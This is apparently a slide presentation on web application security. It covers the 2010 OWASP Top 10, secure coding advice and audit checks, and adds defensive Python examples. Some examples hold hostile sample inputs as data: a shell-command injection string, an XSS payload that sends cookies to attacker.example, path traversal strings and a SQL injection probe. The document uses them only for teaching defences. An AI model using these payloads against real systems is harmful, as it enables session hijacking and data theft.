Upload: samson-daniels

Post on 12-Jan-2016


Page 1: PHP ASP.NET JSP Perl Apache Microsoft IIS Internet Explorer Netscape Hackers OWASP

PHP, ASP.NET, JSP, Perl

Apache, Microsoft IIS

Internet Explorer, Netscape

Hackers

OWASP

Page 2:

Agenda

Understanding Web Applications
OWASP Top 10 Vulnerabilities
Writing Secure Web Applications
Auditing Web Applications
Questions and Answers

Page 3:

What is a Web Application?

It is an application that is accessed via a web browser over a network (the Internet or an intranet).

An application, generally comprising a collection of scripts, that resides on a Web server and interacts with databases or other sources of dynamic content.

Any examples? Some examples of Web Applications include search engines, webmail, shopping carts (Amazon, eBay) and portal systems (iGoogle, Yahoo).

Page 4:

Some examples of Web Applications

Page 5:

What is the key reason for their popularity?

The ability to update and maintain web applications without distributing and installing software on potentially thousands of client computers.

They require little or no disk space on the client, upgrade automatically with new features, integrate easily with other server-side web services such as e-mail and search, and need no additional hardware or software configuration on the client.

Their inherent support for cross-platform compatibility.

Web applications range from simple tasks, such as filling in a form for a particular facility (placing orders in Net Banking), to major projects.

Web applications are easy to use and are often more presentable and attractive than traditional desktop software.

Page 6:

What's the Business Use?

An emerging strategy for application software companies is to provide web access to software previously distributed as local applications.

These programs let the user pay a monthly or yearly fee for use of a software application without having to install it on a local hard drive.

A company that follows this strategy is known as an application service provider (ASP), and ASPs are currently receiving much attention in the software industry.

Page 7:

How do the above contribute to Web Applications?

Web Programming Language:

The Web places some specific constraints on our choices: the ability to deal with a variety of protocols and formats (e.g. graphics) and programming tasks; performance (speed and size); platform independence; and the basic ability to work with other Web tools and languages.

PHP, ASP.NET, JSP (Java Server Pages), Perl and Cold Fusion, which fall into two main groups: proprietary and open source.

Of those listed, PHP, JSP and Perl are open source; Cold Fusion and ASP.NET were proprietary at the time of this presentation (the later ASP.NET Core is open source).

Page 8:

Web Server Software:

A computer program that delivers content, such as Web pages, using the Hypertext Transfer Protocol (HTTP), over the World Wide Web.

Features:
Virtual hosting to serve many Web sites using one IP address.
Large file support to be able to serve files larger than 2 GB on a 32-bit OS.
Bandwidth throttling to limit the speed of responses (so the link does not saturate) and to be able to serve more clients.
Server-side scripting to generate dynamic Web pages.

Some examples include Apache HTTP Server, Microsoft IIS and, for Java servlets and JSP, Apache Tomcat.

Page 9:

Web Browser:

A software application for retrieving, presenting, and traversing information resources on the World Wide Web.

Hyperlinks enable users to easily navigate their browsers to related resources.

All major web browsers allow the user to open multiple information resources at the same time, either in different browser windows or in different tabs of the same window. They include pop-up blockers to prevent unwanted windows from "popping up" without the user's consent.

Some popular browsers are Internet Explorer, Mozilla Firefox, Netscape Navigator, Safari, Opera etc.

Page 10:

Open Web Application Security Project (OWASP)

The OWASP community includes corporations, educational organizations, and individuals from around the world.

OWASP is an open-source application security project.

All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security.

OWASP is not affiliated with any technology company (free from commercial pressures), and it provides unbiased, practical, cost-effective information about application security.

Page 11:

OWASP Top 10 Application Security Risks – 2010

A1 – Injection: occurs when untrusted data is sent to an interpreter (SQL, the OS shell, LDAP and so on) as part of a command or query. The attacker's data tricks the interpreter into executing unintended commands or accessing data without authorization.

A2 – Cross Site Scripting (XSS): occurs when an application sends untrusted data to a web browser without proper validation or escaping. It allows attackers to execute script in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Page 12:

A3 – Broken Authentication and Session Management: occurs when developers fail to protect their users' sensitive information such as user names, passwords, and session tokens, letting attackers assume other users' identities.

A4 – Insecure Direct Object References: occurs when a developer exposes a reference to an internal implementation object (file, directory, or database key) without an access control check, so an attacker can manipulate the reference to reach data they are not authorized to see.

Page 13:

A5 – Cross Site Request Forgery (CSRF): forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically sent authentication information, to a vulnerable web application, which then treats the request as the victim's own.

A6 – Security Misconfiguration: security depends on having a secure configuration defined, implemented and maintained for the application, framework, web server, application server, and platform. Defaults are often insecure, and all of these components must be kept up to date.
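The defence implied by A5, as an added Python example that is not from the original presentation: a per-session secret token placed in a hidden form field and compared, in constant time, against the server-side session on every state-changing request. The in-memory session store, the transfer form and the /transfer handler are constructed for the demo.

```python
import hmac
import secrets

# In-memory session store standing in for the server's session backend (constructed for this demo).
SESSIONS = {}


def create_session(user: str) -> str:
    """Log a user in: random session id, plus a random CSRF token bound to that session."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid: str) -> str:
    """The token is embedded in the page served to the logged-in user. A cross-site
    attacker's page cannot read it (same-origin policy), so it cannot reproduce it."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(cookies: dict, form: dict) -> dict:
    """State-changing endpoint: the session cookie alone is NOT enough, because the
    browser attaches it to forged cross-site requests automatically."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return {"status": 401, "body": "not logged in"}
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf"]):
        return {"status": 403, "body": "CSRF token missing or invalid"}
    return {"status": 200, "body": f"{session['user']} sent {form['amount']} to {form['to']}"}


def demo() -> dict:
    sid = create_session("alice")
    cookies = {"session": sid}  # sent by the browser on every request to this site
    # Forged POST from attacker.example: cookie present, token absent or guessed.
    forged = handle_transfer(cookies, {"to": "mallory", "amount": "1000"})
    guessed = handle_transfer(cookies, {"to": "mallory", "amount": "1000", "csrf_token": "AAAA"})
    # Legitimate submission of the form rendered for alice.
    token = SESSIONS[sid]["csrf"]
    legit = handle_transfer(cookies, {"to": "bob", "amount": "10", "csrf_token": token})
    return {"forged": forged["status"], "guessed": guessed["status"], "legit": legit["status"]}


if __name__ == "__main__":
    print(demo())
```

The forged and guessed submissions fail because the attacker can cause the victim's cookie to be sent but cannot obtain the token. Current browsers add a second layer if the session cookie is marked SameSite=Lax or Strict.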

Page 14:

A7 – Insecure Cryptographic Storage: many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing.

A8 – Failure to Restrict URL Access: many web applications check URL access rights before rendering protected links and buttons, but do not repeat the check when the protected page itself is requested. Attackers can forge URLs to access the "hidden" pages anyway.

Page 15:

A9 – Insufficient Transport Layer Protection: applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.

A10 – Unvalidated Redirects and Forwards: web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages.

Page 16:

The threat landscape for Internet applications changes with advances by attackers, new technology, and increasingly complex systems. To keep pace, OWASP updates the Top 10 periodically.

They have changed OWASP's ranking methodology to estimate risk, instead of relying solely on the frequency of the associated weakness.

OWASP Top 10 Risk Rating Methodology
Attack Vector: how hard it is for an attacker to use this flaw
Weakness Prevalence: how often it is found
Weakness Detectability: how hard it is for an attacker to find the flaw
Technical Impact: how much damage a successful attack does
This is generic across the Internet, not specific to any organization.

Threat Agent | Attack Vector | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impact
?            | Easy          | Widespread          | Easy                   | Severe           | ?
?            | Average       | Common              | Average                | Moderate         | ?
?            | Difficult     | Uncommon            | Difficult              | Minor            | ?

(? = application or business specific; these two columns are for each organization to fill in.)

Page 18:

Cenzic Web Application Security Trends Report reveals 90% of Web Applications vulnerable, Adobe one of the most vulnerable.

Source: Cenzic Web Application Security Trends Report

Page 19:

What are the root causes of Application vulnerabilities?

Every application security problem has a root cause somewhere in the organization.

It may be that the project didn't have the right activities in their development process, or it may be that the developers didn't have the right training, or it might even be that the team didn't have the right tools for the job.

Page 20:

Writing Secure Web Applications

Page 21:

Sanitize browser input

Two dangers with browser input data:

Input containing shell metacharacters such as ; | & ` $ (and ! under bash history expansion) could cause the web server to execute an OS command or behave in other unexpected ways if the input is ever handed to a shell.

User input stored on the server could contain malicious HTML tags and scripts. When another user views the input, that user's web browser could execute the HTML and scripts.

"The best practice is to strip unwanted characters, invisible characters and HTML tags from user input"

Stripping alone is fragile: validate input against an allowlist of what the field may contain, avoid passing input to a shell at all, and encode output for the context it is inserted into (HTML body, attribute, JavaScript, URL) rather than relying on removal.
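The two dangers above in working Python, as an added example that is not from the original presentation or the advosys paper it quotes (it also serves A1 Injection and A2 XSS on page 11): an allowlist check plus a shell-free argv list for input that reaches an OS command, and context-aware HTML encoding for stored input shown to other users. The finger lookup, the sample inputs and the echo stand-in are constructed for the demo.

```python
import html
import re
import subprocess

# Constructed sample inputs for this demo (not from the original presentation).
SAMPLE_INPUTS = {
    "benign": "alice",
    "shell": "alice; cat /etc/passwd",   # ';' chains a second command if a shell parses it
    "xss": '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
}

# Allowlist: what a username MAY contain. Everything else is rejected, which is
# more robust than trying to strip every dangerous character (! & ; | ` $ ...).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def validate_username(value: str) -> str:
    if not USERNAME_RE.fullmatch(value):
        raise ValueError(f"rejected username: {value!r}")
    return value


def lookup_command_unsafe(user: str) -> str:
    """The dangerous pattern: raw input interpolated into a command line that a shell
    will parse (os.system / shell=True). Returned as a string here, never executed."""
    return f"finger {user}"


def lookup_command_safe(user: str) -> list:
    """argv list, no shell: metacharacters reach the program as plain bytes, and
    validation runs first so hostile input never gets near the command at all."""
    return ["finger", validate_username(user)]


def run_lookup_safe(user: str) -> str:
    """Executes the safe form; 'echo' stands in for 'finger' so the demo runs anywhere."""
    argv = ["echo", "lookup:"] + lookup_command_safe(user)[1:]
    completed = subprocess.run(argv, capture_output=True, text=True, check=True)
    return completed.stdout.strip()


def render_comment(stored_text: str) -> str:
    """Encode stored user text for the HTML body context when another user views it.
    html.escape turns < > & " ' into entities, so a stored <script> renders as text."""
    return '<p class="comment">' + html.escape(stored_text, quote=True) + "</p>"


def demo() -> dict:
    results = {}
    for name, value in SAMPLE_INPUTS.items():
        try:
            results[name] = run_lookup_safe(value)
        except ValueError as exc:
            results[name] = f"rejected: {exc}"
    results["unsafe_command_line"] = lookup_command_unsafe(SAMPLE_INPUTS["shell"])
    results["rendered_xss"] = render_comment(SAMPLE_INPUTS["xss"])
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the escaping in render_comment is correct only for text inside an HTML element; a value inserted into a JavaScript string, a URL or a CSS property needs the encoder for that context.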

Page 22:

Don't put everything in the HTML directory

For example, if your Web Application places a data file named "card_number.dat" in /public_html (the web server's document root), any outsider who guesses the file name can view its contents in their browser.

"You should have separate locations for HTML files, executable programs, shared library code and data. Separating the data files into sub-directories by application helps eliminate file naming problems"

Page 23:

Hidden fields aren't

Many programs rely on so-called "hidden" form fields to store state information, settings and previous input data.

HTML "hidden" fields are not hidden and not secure. Users can see them by viewing the HTML source of your form in their browser, and can change them before submitting the form.

Contents of hidden fields should be sanitized and validated just like any other user input field. Hidden fields should not be used to set access modes or privileges for a program.
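One way to keep state in a hidden field without trusting it, as an added Python example that is not part of the original presentation: the server signs the state with an HMAC so any edit is detected, recomputes the price from its own catalog, and takes privilege from the session rather than the form. The secret, catalog, form fields and checkout handler are all assumptions constructed for the demo.

```python
import base64
import binascii
import hashlib
import hmac
import json

# Assumed server-side secret (constructed for this demo). Load it from a secret
# store in real code and never send it to the client.
SERVER_SECRET = b"demo-secret-0123456789-do-not-reuse"

# Authoritative prices live on the server; the form never decides the price.
CATALOG = {"sku-1001": 4999, "sku-1002": 12000}   # cents


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode()


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text.encode())


def sign_state(state: dict, secret: bytes = SERVER_SECRET) -> str:
    """Serialize state and append an HMAC-SHA256 tag. This gives integrity only:
    the user can still read the payload, so put nothing secret in it."""
    payload = json.dumps(state, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(secret, payload, hashlib.sha256).digest()
    return _b64e(payload) + "." + _b64e(tag)


def verify_state(token: str, secret: bytes = SERVER_SECRET) -> dict:
    """Recompute the tag and compare in constant time before trusting the payload."""
    try:
        payload_b64, tag_b64 = token.split(".", 1)
        payload, tag = _b64d(payload_b64), _b64d(tag_b64)
    except (ValueError, binascii.Error) as exc:
        raise ValueError("malformed state token") from exc
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("state token failed integrity check")
    return json.loads(payload)


def checkout(form: dict, session_role: str) -> dict:
    """Handle the submitted form. The hidden 'state' field is verified, the price is
    recomputed from CATALOG, and any 'price' or 'role' field the client sends is
    ignored. The staff discount comes from the server-side session, never the form."""
    state = verify_state(form["state"])
    sku = state["sku"]
    qty = int(form["qty"])
    if not 1 <= qty <= 10:
        raise ValueError("quantity out of range")
    discount = 0.5 if session_role == "staff" else 0.0
    total = round(CATALOG[sku] * qty * (1 - discount))
    return {"sku": sku, "qty": qty, "total_cents": total}


def tamper_demo() -> str:
    """Edit the hidden field's payload (as a user can via view-source) but keep the old tag."""
    token = sign_state({"sku": "sku-1001"})
    _, tag_b64 = token.split(".", 1)
    forged = _b64e(b'{"sku":"sku-1002"}') + "." + tag_b64
    try:
        verify_state(forged)
        return "accepted"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    form = {"state": sign_state({"sku": "sku-1001"}), "qty": "2", "price": "1"}
    print(checkout(form, "customer"))   # the client's 'price' field is ignored
    print(tamper_demo())
```

Signing does not make the field secret, and a signed token can still be replayed; if that matters, include an expiry or a nonce tied to the session in the state.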

Page 24:

Use POST instead of GET

HTML forms can be submitted using either the GET or the POST method.

The GET method sends all form input to the web application as part of the URL, where it ends up in browser history, proxy and server logs, and Referer headers sent to other sites.

"POST is preferred, especially when sending sensitive information"

POST only keeps the data out of the URL; it is still readable on the wire unless the connection uses TLS (HTTPS).

Page 25:

Validate on the Server

It's easy for a knowledgeable user to save an HTML form, disable the embedded JavaScript, then use the modified form to submit bad data back to the web application (or to skip the form entirely and send the request with a tool).

When the application expects all input validation to have already been done by the web browser, and therefore doesn't double-check the input, your Web Application can be compromised.

"Client-side validation should never be trusted as a replacement for additional server-side validation."

Page 26:

Avoid real directory or file names

"Never use actual directory or file names as parameters or construct names based on user input. Instead, use keywords that are pointers and store the actual file or directory names in a lookup table".

For example, in a Perl program do NOT do this:

    WRONG!
    my $datafile = param('datafilename');
    # two-argument open: "../../etc/passwd" reads any file the web server can,
    # and a value beginning or ending with "|" runs a command
    open(DATAFILE, $datafile) or die "cannot open $datafile: $!";

Instead, do something like this:

    BETTER
    my %filelist = (
        "name"    => "/home/data/name.txt",
        "address" => "/home/data/address.txt",
    );
    my $keyword = param('datafilename');
    die "unknown data set" unless exists $filelist{$keyword};
    open(DATAFILE, '<', $filelist{$keyword}) or die "cannot open: $!";
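The same lookup-table pattern in Python, as an added example that is not from the original presentation or the advosys paper, extended with the check a practitioner wants when a user-supplied file name cannot be avoided: canonicalize the path and require it to stay inside the data directory. The temporary directory tree, its contents and the keyword table are constructed for the demo.

```python
import os
import tempfile

# Keyword -> file name inside the application's data directory. The real names
# never appear in a URL or form parameter.
FILELIST = {"name": "name.txt", "address": "address.txt"}


def build_demo_tree() -> str:
    """Constructed for this demo: a data directory with two records and, one level
    up, a file that must never be reachable through the application."""
    root = tempfile.mkdtemp(prefix="webapp-demo-")
    data_dir = os.path.join(root, "data")
    os.mkdir(data_dir)
    for name, text in (("name.txt", "Jane Doe"), ("address.txt", "1 Main St")):
        with open(os.path.join(data_dir, name), "w") as fh:
            fh.write(text)
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("db_password=hunter2")
    return root


def read_by_keyword(root: str, keyword: str) -> str:
    """The slide's recommendation: the parameter is a lookup key, not a path."""
    if keyword not in FILELIST:
        raise KeyError(f"unknown data set {keyword!r}")
    with open(os.path.join(root, "data", FILELIST[keyword]), "r") as fh:
        return fh.read()


def read_by_filename(root: str, filename: str) -> str:
    """Fallback when a user-supplied name is unavoidable: canonicalize (resolving
    '..' and symlinks) and require the result to remain inside the data directory."""
    data_dir = os.path.realpath(os.path.join(root, "data"))
    candidate = os.path.realpath(os.path.join(data_dir, filename))
    if os.path.commonpath([data_dir, candidate]) != data_dir:
        raise PermissionError(f"path escapes data directory: {filename!r}")
    with open(candidate, "r") as fh:
        return fh.read()


def demo() -> dict:
    root = build_demo_tree()
    out = {"keyword_ok": read_by_keyword(root, "name"),
           "file_ok": read_by_filename(root, "address.txt")}
    # Traversal and absolute-path attempts (constructed attacker inputs).
    for label, func, arg in (("keyword_traversal", read_by_keyword, "../secret.txt"),
                             ("file_traversal", read_by_filename, "../secret.txt"),
                             ("file_absolute", read_by_filename, "/etc/passwd")):
        try:
            func(root, arg)
            out[label] = "ALLOWED"
        except (KeyError, PermissionError) as exc:
            out[label] = f"rejected ({type(exc).__name__})"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

os.path.join discards the base when the second argument is absolute, which is why the containment check runs on the canonicalized result rather than on the raw string.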

Page 27:

Specify the OPEN mode when opening a file

When opening a file for reading only, specify that it should be opened read-only.

Most programming languages allow modes to be specified when opening files: read-only, write, append, read/write etc.

"Always explicitly specify the mode, especially if a file should only be opened read-only. Do not rely on the default mode of the programming language... the default may change in future versions"

Page 28:

Log suspicious errors

"All applications should be written to trap errors."

Web applications are frequently attacked. It's a good idea to not only trap and recover from errors, but also to log events that may indicate an attack (repeated validation failures, malformed requests, access-denied conditions), with enough context (time, source address, request) to investigate them later.

Page 29:

Auditing Web Applications

Page 30:

Verify all INPUT is validated prior to use by the Web Application

Discuss with the Web Admin the methodology used for input validation for the Application.

Use filtering criteria such as data type, allowed character set, min & max length, whether null is allowed, whether the parameter is allowed at all, numeric range, special legal values, specific patterns (regular expressions) etc.
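The filtering criteria listed above turned into a server-side validator, as an added Python example that is not part of the original presentation; it also illustrates the "Validate on the Server" slide on page 25. The registration-form schema, its field names and the sample submissions are assumptions constructed for the demo.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Rule:
    """One parameter's filtering criteria, mirroring the audit checklist."""
    kind: type = str                     # data type after conversion
    required: bool = True                # False: null / missing is allowed
    min_len: int = 0                     # min & max length of the raw text
    max_len: int = 255
    charset: Optional[str] = None        # regex character class of allowed characters
    min_val: Optional[float] = None      # numeric range
    max_val: Optional[float] = None
    allowed: Optional[frozenset] = None  # special legal values
    pattern: Optional[str] = None        # specific pattern (full-match regex)


# Assumed schema for a hypothetical registration form (constructed for this demo).
SCHEMA = {
    "username": Rule(min_len=3, max_len=32, charset=r"[A-Za-z0-9_.-]"),
    "age": Rule(kind=int, required=False, min_val=0, max_val=150),
    "country": Rule(allowed=frozenset({"IN", "US", "GB"})),
    "zip": Rule(required=False, pattern=r"\d{5}(-\d{4})?"),
}


def validate(params: dict, schema: dict = SCHEMA) -> dict:
    """Positive validation: every parameter must be in the schema and meet its rule.
    Returns the converted values plus one error per rejected parameter."""
    clean, errors = {}, {}
    for name in set(params) - set(schema):
        errors[name] = "parameter not allowed"      # "whether parameter allowed or not"
    for name, rule in schema.items():
        raw = params.get(name)
        if raw is None or raw == "":
            if rule.required:
                errors[name] = "required"
            else:
                clean[name] = None
            continue
        if not isinstance(raw, str):
            errors[name] = "must be text"           # form input always arrives as text
            continue
        if not rule.min_len <= len(raw) <= rule.max_len:
            errors[name] = f"length must be {rule.min_len}-{rule.max_len}"
            continue
        if rule.charset and not re.fullmatch(f"(?:{rule.charset})+", raw):
            errors[name] = "contains disallowed characters"
            continue
        if rule.pattern and not re.fullmatch(rule.pattern, raw):
            errors[name] = "does not match expected pattern"
            continue
        if rule.allowed is not None and raw not in rule.allowed:
            errors[name] = "not a legal value"
            continue
        try:
            value = rule.kind(raw)
        except ValueError:
            errors[name] = f"must be {rule.kind.__name__}"
            continue
        if rule.min_val is not None and value < rule.min_val:
            errors[name] = f"must be >= {rule.min_val}"
            continue
        if rule.max_val is not None and value > rule.max_val:
            errors[name] = f"must be <= {rule.max_val}"
            continue
        clean[name] = value
    return {"ok": not errors, "values": clean, "errors": errors}


if __name__ == "__main__":
    # Constructed submissions: a legitimate one and a hostile one.
    print(validate({"username": "alice_1", "age": "34", "country": "IN", "zip": "12345"}))
    print(validate({"username": "admin'--", "age": "-5", "country": "XX", "is_admin": "1"}))
```

The validator is the audit's reference point: for each parameter the application accepts, the reviewer should be able to name which of these criteria apply and where in the code they are enforced.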

Verify proper Authorization Controls are enforced

Failure to have a policy or written documentation for a home-grown application is a red flag that suggests access controls are not being enforced correctly.

Typical ways authorization gets bypassed include cached IDs, file permissions, and client-side caching (of PII).

Page 31:

Broken Authentication and Session Management

Account credentials and session tokens must be protected. Discuss with the Admin the authentication mechanism used to authenticate users to the Web Application. The Web Application should have a built-in facility to handle the life cycle of user accounts. Verify that Helpdesk functionality (such as lost passwords) is handled securely. Follow the guiding principles published by OWASP.

Verify that the server is updated with all known patches for buffer overflows

Discuss this with the Web Admin to ensure that any applicable patches have been installed.

In certain cases, commercial web applications require their own patches separate from the web platform.

Page 32:

Review the website for Cross-Site-Scripting (XSS) vulnerabilities

The best method is to do a thorough code review with the Admin. Validate every header, cookie, query string, form field and hidden field. Tools like Nikto and Nessus can find well-known attacks, but they are not as good as performing a solid code review. Consider hiring third-party help if you require resources.

Ensure the Web Application is protected against Injection attacks

Validate all input using positive validation methods (define what input should be, rather than what it should not be).

Perform a code review, if possible, of all calls to external resources (databases, the OS shell, LDAP) to determine whether the call could be compromised; prefer parameterized queries and APIs over string concatenation.

Commercial tools help find well-known attacks, but are not as good as code review.

Consider hiring 3rd-party help if the application is particularly sensitive.

Page 33:

Evaluate the use of proper error handling.

Discuss with the Admin how error handling is designed into the Web App. Error handling is often better controlled if it is centralized as opposed to compartmentalized across several interworking objects/components.

If you are reviewing the code, the error handling should flow nicely and show structure. Check that detailed errors (stack traces, SQL errors, file paths) go to the log and not to the client.
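A centralized error boundary of the kind the audit looks for, as an added Python example that is not part of the original presentation; it also serves the "Log suspicious errors" slide on page 28. Detail goes to the log with a request id, the client sees only a generic message, and a small detection pass counts suspicious events per source. The views, request records and in-memory log sink are constructed for the demo.

```python
import logging
import re
import traceback
import uuid
from io import StringIO

# Log sink kept in memory so the demo is self-contained; use a real handler in production.
LOG_BUFFER = StringIO()
logger = logging.getLogger("webapp.errors")
logger.setLevel(logging.INFO)
logger.propagate = False
logger.addHandler(logging.StreamHandler(LOG_BUFFER))


class InputRejected(Exception):
    """Raised by validation; repeated occurrences from one source suggest probing."""


def handle_request(view, request: dict) -> dict:
    """Single error boundary for every view: detail goes to the log with a request id,
    the client only ever sees a generic message plus that id for support lookups."""
    request_id = uuid.uuid4().hex[:12]
    try:
        return {"status": 200, "body": view(request), "request_id": request_id}
    except InputRejected as exc:
        logger.warning("SUSPICIOUS id=%s ip=%s path=%s reason=%s",
                       request_id, request.get("ip"), request.get("path"), exc)
        return {"status": 400, "body": "Bad request", "request_id": request_id}
    except Exception:
        logger.error("UNHANDLED id=%s ip=%s path=%s\n%s", request_id,
                     request.get("ip"), request.get("path"), traceback.format_exc())
        return {"status": 500, "body": "Internal error", "request_id": request_id}


def report_view(request: dict) -> str:
    """Hypothetical view: rejects obvious traversal and injection probes."""
    name = request.get("report", "")
    if ".." in name or "/" in name or "'" in name:
        raise InputRejected(f"hostile report name {name!r}")
    return f"report {name}"


def crashing_view(request: dict) -> str:
    return str(1 / 0)   # stands in for any unexpected server-side failure


def suspicious_counts() -> dict:
    """Detection pass over the log: SUSPICIOUS events per source address."""
    counts = {}
    for line in LOG_BUFFER.getvalue().splitlines():
        match = re.match(r"SUSPICIOUS id=\S+ ip=(\S+)", line)
        if match:
            counts[match.group(1)] = counts.get(match.group(1), 0) + 1
    return counts


def demo() -> list:
    # Constructed requests: one normal, two probes from one address, one crash.
    requests = [
        (report_view, {"ip": "198.51.100.7", "path": "/report", "report": "q1"}),
        (report_view, {"ip": "203.0.113.5", "path": "/report", "report": "../../etc/passwd"}),
        (report_view, {"ip": "203.0.113.5", "path": "/report", "report": "q1' OR '1'='1"}),
        (crashing_view, {"ip": "198.51.100.7", "path": "/stats"}),
    ]
    return [handle_request(view, req) for view, req in requests]


if __name__ == "__main__":
    for response in demo():
        print(response)
    print(suspicious_counts())
```

In a real deployment the SUSPICIOUS lines would feed an alert on a per-source threshold; the request id returned to the client lets support staff find the full detail without ever exposing it in the response.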

Ensure that secure storage mechanisms are used correctly and appropriately.

If data are sensitive and not encrypted, consider whether there are industry / regulatory drivers stating that the data must be encrypted, and note the issue.

If encrypted, understand how the encryption mechanism was implemented (algorithm, key management, where the key is stored).

Ensure that the level of protection matches the sensitivity of the data (for extremely sensitive data, use real, standard cryptography rather than a simple home-grown algorithm that merely obfuscates the data; passwords in particular should be stored as salted, slow one-way hashes rather than encrypted).
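The difference between obfuscation and proper credential storage, as an added Python example that is not part of the original presentation (it also illustrates A7 Insecure Cryptographic Storage): a reversible base64 "encoding" beside salted PBKDF2-HMAC-SHA256 with constant-time verification. The sample password and the iteration count are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import os

# Iteration count for PBKDF2-HMAC-SHA256; an assumption for this demo, to be tuned to
# roughly 100 ms per hash on the server that runs it (OWASP's 2023 guidance is 600,000).
ITERATIONS = 600_000


def obfuscate(password: str) -> str:
    """What 'a simple algorithm that obfuscates' looks like: reversible and keyless."""
    return base64.b64encode(password.encode()).decode()


def deobfuscate(stored: str) -> str:
    return base64.b64decode(stored).decode()


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Salted, slow, one-way: what credentials should be stored as."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, base64.b64encode(salt).decode(),
                                       base64.b64encode(dk).decode())


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt, expected = base64.b64decode(salt_b64), base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    return hmac.compare_digest(dk, expected)   # constant-time comparison


def demo() -> dict:
    password = "correct horse battery staple"   # constructed sample
    weak = obfuscate(password)
    # Lower iteration count only to keep the demo quick; use ITERATIONS in real code.
    strong_a = hash_password(password, iterations=20_000)
    strong_b = hash_password(password, iterations=20_000)
    return {
        "obfuscated_recoverable": deobfuscate(weak) == password,   # anyone with the DB wins
        "salted_hashes_differ": strong_a != strong_b,             # same password, different records
        "verify_correct": verify_password(password, strong_a),
        "verify_wrong": verify_password("Tr0ub4dor&3", strong_a),
    }


if __name__ == "__main__":
    print(demo())
```

PBKDF2 is used here because it is in the Python standard library; where a third-party library is acceptable, Argon2id or bcrypt are the stronger choices for password storage.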

Page 34:

Determine the use of adequate controls to prevent DoS.

Authenticated users would have more resources, and visiting (anonymous) users would be limited in scope as to what they can access.

Resource-intensive operations, such as DB queries, may in some cases be offloaded or queued.

Make sure that your hardware and memory are sufficient for the Web Application.

You can use open-source stress-testing tools.
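The tiering described above as a concrete control, added here as a Python example that is not part of the original presentation: a per-client token bucket with a small budget for anonymous sources and a larger one for authenticated users, checked before any expensive work starts. The tier numbers, client keys and traffic pattern are assumptions constructed for the demo.

```python
import time

# (burst capacity, refill per second) per tier; the values are assumptions for the demo.
TIERS = {"anonymous": (5, 1.0), "authenticated": (50, 10.0)}


class TokenBucketLimiter:
    """Per-client token buckets. Each request costs one token; buckets refill at the
    tier's rate, so bursts are tolerated but sustained floods are refused early,
    before they reach expensive code paths such as database queries."""

    def __init__(self, tiers=TIERS, clock=time.monotonic):
        self.tiers = tiers
        self.clock = clock
        self.buckets = {}   # client key -> (tokens, time of last update)

    def allow(self, client_key: str, tier: str) -> bool:
        capacity, rate = self.tiers[tier]
        now = self.clock()
        tokens, last = self.buckets.get(client_key, (float(capacity), now))
        tokens = min(float(capacity), tokens + (now - last) * rate)
        if tokens >= 1.0:
            self.buckets[client_key] = (tokens - 1.0, now)
            return True
        self.buckets[client_key] = (tokens, now)
        return False


def simulate() -> dict:
    """Constructed traffic against a fake clock: an anonymous flood, a one-second wait,
    and the same burst from an authenticated user."""
    fake_now = [0.0]
    limiter = TokenBucketLimiter(clock=lambda: fake_now[0])
    anon = [limiter.allow("ip:203.0.113.9", "anonymous") for _ in range(8)]
    fake_now[0] += 1.0                                     # one second passes: one token refills
    anon_after_wait = limiter.allow("ip:203.0.113.9", "anonymous")
    auth = [limiter.allow("user:alice", "authenticated") for _ in range(8)]
    return {"anon_allowed": sum(anon), "anon_denied": len(anon) - sum(anon),
            "anon_after_wait": anon_after_wait, "auth_allowed": sum(auth)}


if __name__ == "__main__":
    print(simulate())
```

Anonymous clients are keyed by source address and authenticated ones by user, which mirrors the slide's tiering; resource-intensive endpoints can be given their own, tighter tier, and the bucket state should live in shared storage when the application runs on more than one server.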

Page 35:

Review controls surrounding maintaining a secure configuration

Discuss the following with the Admin to ensure proper configuration management controls are in place:
– Security mailing lists for the web server, platform, and application are monitored.
– The latest security patches are applied.
– Vulnerability assessment (VA) scans from both internal and external perspectives are conducted.
– A security configuration guideline exists for the web servers and is strictly followed.
– Regular internal reviews of the server's security configuration are conducted.
– Regular status reports are issued to upper management documenting the overall security posture of the web servers.

Page 36:

Some Web Application Testing Tools

iMacros - browser automation tool from iOpus.com (free trial)

Burp Suite - an integrated platform for attacking web applications.

AppScan - from IBM, offers static and dynamic security testing in all stages of application development. (trial download)

HP WebInspect - web application security testing for complex web applications. (15 days evaluation)

Page 37:

A presentation on

Basics of Web Application Vulnerabilities - Best Practices

